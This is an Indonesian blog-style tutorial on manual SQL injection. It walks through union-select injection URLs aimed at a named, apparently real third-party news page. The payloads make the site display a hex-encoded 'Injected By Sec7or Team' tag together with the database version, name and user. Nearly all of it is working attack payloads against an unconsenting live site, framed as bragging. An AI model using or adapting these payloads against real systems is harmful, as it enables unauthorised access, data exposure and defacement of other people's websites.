Cara Menampilkan Nama Kita, Versi, Dan Database Pada SQLi Manual - Baiklah :v kali ini saya mau membagikan Cara Menampilkan Nama Kita, Versi, Dan Database Pada SQLi Manual yups masih banyak yang belum tau bagaimana caranya :v langsung saja kita cari target :D
Oke setelah terinject dan muncul magic number contohnya seperti ini :
http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,3,4,5--+
Seperti yang kita ketahui disitu muncul magic number angka 3 untuk menampilkan nama kita, kita bisa menggunakan concat
Oke kita contohkan saya ingin menampilkan "Injected By Sec7or Team"
Query akan menjadi seperti ini
http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(Injected By Sec7or Team),4,5--+
Tapi itu belum selesai yang harus kita lakukan selanjutnya adalah menkonvert
"Injected By Sec7or Team" menggunakan hex bisa menggunakan tools yang udah kesebar di gugel atau bisa langsung menggunakan hackbar
download di sini
Pada hackbar ini ada otomatis konvert unhex buatan root-kajj jadi pada saat setekah konvert tidak perlu lagi menambah 0x pada depan hasil konvertan jadi query nya adalah
http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(0x496e6a656374656420427920536563376f72205465616d),4,5--+
Baiklah untuk menambah pemanis kita juga print versi dan database nya
query akan menjadi seperti ini
http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(0x496e6a656374656420427920536563376f72205465616d,version(),database()),4,5--+
Tampilan di atas masih acak acak kalian bisa menambahkan sendiri spasi atau mempermanis dengan menambah tag html :*
Tambahan :
user() : menampilkan user
version() : menampilkan versi
database() : menampilan database
Jika masih ada yang ingin ditanyakan silahkan tanyakan pada komentar :v
Happy suntik menyuntik ;v